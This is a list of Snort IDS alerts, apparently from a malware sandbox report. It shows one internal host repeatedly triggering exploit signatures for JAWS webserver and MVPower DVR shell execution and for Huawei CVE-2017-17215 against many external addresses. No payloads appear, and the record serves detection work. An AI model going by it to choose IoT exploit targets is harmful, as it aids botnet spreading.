      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55902 -> 117.20.106.57:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56648 -> 107.172.253.175:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38938 -> 23.13.20.123:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47744 -> 184.24.204.48:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38388 -> 162.14.101.33:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48506 -> 49.40.48.52:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33964 -> 54.195.88.168:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52530 -> 178.16.125.78:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60212 -> 2.23.6.50:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38938 -> 23.13.20.123:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45362 -> 212.76.114.212:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55902 -> 117.20.106.57:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47844 -> 121.189.159.8:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60758 -> 154.93.247.231:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33964 -> 54.195.88.168:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56360 -> 117.51.135.23:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38388 -> 162.14.101.33:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48506 -> 49.40.48.52:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47844 -> 121.189.159.8:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60758 -> 154.93.247.231:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47936 -> 67.205.162.99:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58894 -> 192.169.179.36:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47936 -> 67.205.162.99:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56156 -> 45.201.221.12:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58894 -> 192.169.179.36:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39198 -> 20.31.197.7:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56840 -> 31.136.62.45:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56156 -> 45.201.221.12:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57886 -> 125.141.214.176:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39198 -> 20.31.197.7:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59550 -> 156.250.15.73:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57886 -> 125.141.214.176:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59550 -> 156.250.15.73:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58310 -> 156.77.134.107:37215
      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58310 -> 156.77.134.107:37215
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56360 -> 117.51.135.23:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55930 -> 13.249.180.199:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53916 -> 23.49.33.24:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52012 -> 107.170.192.179:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38158 -> 192.185.224.216:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55956 -> 46.242.156.193:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40328 -> 154.177.20.192:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52284 -> 45.143.98.84:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55930 -> 13.249.180.199:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53916 -> 23.49.33.24:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52012 -> 107.170.192.179:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38158 -> 192.185.224.216:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48474 -> 47.107.144.246:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51384 -> 13.35.2.186:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37470 -> 38.59.4.250:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37106 -> 130.237.20.52:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55956 -> 46.242.156.193:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40328 -> 154.177.20.192:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37470 -> 38.59.4.250:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37106 -> 130.237.20.52:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48474 -> 47.107.144.246:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51384 -> 13.35.2.186:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56240 -> 152.0.21.137:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56240 -> 152.0.21.137:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60800 -> 196.51.30.122:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43640 -> 190.188.119.237:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34690 -> 168.188.78.129:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43950 -> 66.228.50.15:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60800 -> 196.51.30.122:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35174 -> 13.245.236.186:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43950 -> 66.228.50.15:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53346 -> 18.169.247.82:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41126 -> 201.0.234.42:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43640 -> 190.188.119.237:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54978 -> 23.77.215.39:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36726 -> 13.33.79.192:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53346 -> 18.169.247.82:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35174 -> 13.245.236.186:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41126 -> 201.0.234.42:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50196 -> 119.63.71.35:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54978 -> 23.77.215.39:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36726 -> 13.33.79.192:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50196 -> 119.63.71.35:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48080 -> 161.111.10.100:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42186 -> 23.33.209.74:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42186 -> 23.33.209.74:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55030 -> 23.77.215.39:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50340 -> 23.20.38.1:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34900 -> 192.249.112.177:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33460 -> 149.12.212.52:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53370 -> 34.110.219.240:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50340 -> 23.20.38.1:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55768 -> 18.118.223.181:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39824 -> 23.50.76.159:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34900 -> 192.249.112.177:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55030 -> 23.77.215.39:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55768 -> 18.118.223.181:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39824 -> 23.50.76.159:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33460 -> 149.12.212.52:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42292 -> 184.86.0.80:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53294 -> 121.29.56.204:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43492 -> 156.241.113.29:37215
      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43492 -> 156.241.113.29:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55228 -> 156.241.121.3:37215
      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55228 -> 156.241.121.3:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59086 -> 14.199.230.221:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42292 -> 184.86.0.80:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53294 -> 121.29.56.204:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59086 -> 14.199.230.221:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34746 -> 185.92.244.181:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48752 -> 144.196.51.221:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37802 -> 66.45.251.86:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34746 -> 185.92.244.181:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48752 -> 144.196.51.221:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37802 -> 66.45.251.86:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51596 -> 44.228.83.23:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51596 -> 44.228.83.23:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38660 -> 23.207.85.25:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51710 -> 124.223.6.126:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54362 -> 168.76.87.9:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38660 -> 23.207.85.25:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51710 -> 124.223.6.126:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33424 -> 34.107.144.174:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52068 -> 52.202.65.129:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54362 -> 168.76.87.9:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33424 -> 34.107.144.174:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47104 -> 184.24.189.62:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52068 -> 52.202.65.129:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52322 -> 217.92.132.150:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47104 -> 184.24.189.62:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52322 -> 217.92.132.150:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53098 -> 77.70.177.50:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33132 -> 172.103.183.224:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60542 -> 99.83.214.23:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60120 -> 130.254.45.112:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42388 -> 124.198.30.115:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46712 -> 119.207.31.177:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53098 -> 77.70.177.50:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55194 -> 198.143.148.2:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53014 -> 156.244.93.143:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53030 -> 156.244.93.143:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33132 -> 172.103.183.224:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60542 -> 99.83.214.23:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58712 -> 104.77.235.192:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55194 -> 198.143.148.2:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60120 -> 130.254.45.112:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33140 -> 185.128.234.2:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36296 -> 38.254.102.193:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55502 -> 185.45.103.64:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58712 -> 104.77.235.192:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46016 -> 18.194.17.176:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48082 -> 138.201.91.232:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47870 -> 18.66.222.155:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46712 -> 119.207.31.177:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53014 -> 156.244.93.143:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58524 -> 221.194.131.87:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33140 -> 185.128.234.2:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36296 -> 38.254.102.193:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53030 -> 156.244.93.143:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55502 -> 185.45.103.64:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46016 -> 18.194.17.176:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48082 -> 138.201.91.232:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47870 -> 18.66.222.155:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58524 -> 221.194.131.87:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53116 -> 156.244.93.143:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40780 -> 146.148.208.213:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33044 -> 173.29.24.187:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38098 -> 45.157.202.26:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35700 -> 44.211.68.173:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43836 -> 148.139.122.144:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43612 -> 103.51.145.51:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33044 -> 173.29.24.187:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53116 -> 156.244.93.143:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39856 -> 204.174.66.89:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35700 -> 44.211.68.173:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43836 -> 148.139.122.144:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38098 -> 45.157.202.26:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59722 -> 23.215.23.30:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36946 -> 80.211.121.124:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39856 -> 204.174.66.89:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44992 -> 222.236.125.137:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43612 -> 103.51.145.51:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59722 -> 23.215.23.30:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36946 -> 80.211.121.124:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44318 -> 103.68.30.182:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44992 -> 222.236.125.137:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51592 -> 67.7.139.186:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58404 -> 154.197.204.145:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44318 -> 103.68.30.182:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51592 -> 67.7.139.186:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38754 -> 51.132.35.116:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58404 -> 154.197.204.145:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55956 -> 195.87.80.165:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57652 -> 91.220.229.249:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35260 -> 95.217.64.14:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55390 -> 147.46.47.201:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45534 -> 54.79.81.187:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38754 -> 51.132.35.116:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57652 -> 91.220.229.249:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55956 -> 195.87.80.165:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35260 -> 95.217.64.14:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55390 -> 147.46.47.201:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45534 -> 54.79.81.187:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38386 -> 64.9.223.38:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57252 -> 51.103.222.229:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44228 -> 104.107.149.204:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59744 -> 202.40.219.199:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55346 -> 34.149.45.236:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53502 -> 192.126.135.96:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59562 -> 52.85.131.245:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53284 -> 156.244.93.143:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43828 -> 205.196.223.118:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57252 -> 51.103.222.229:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55346 -> 34.149.45.236:80
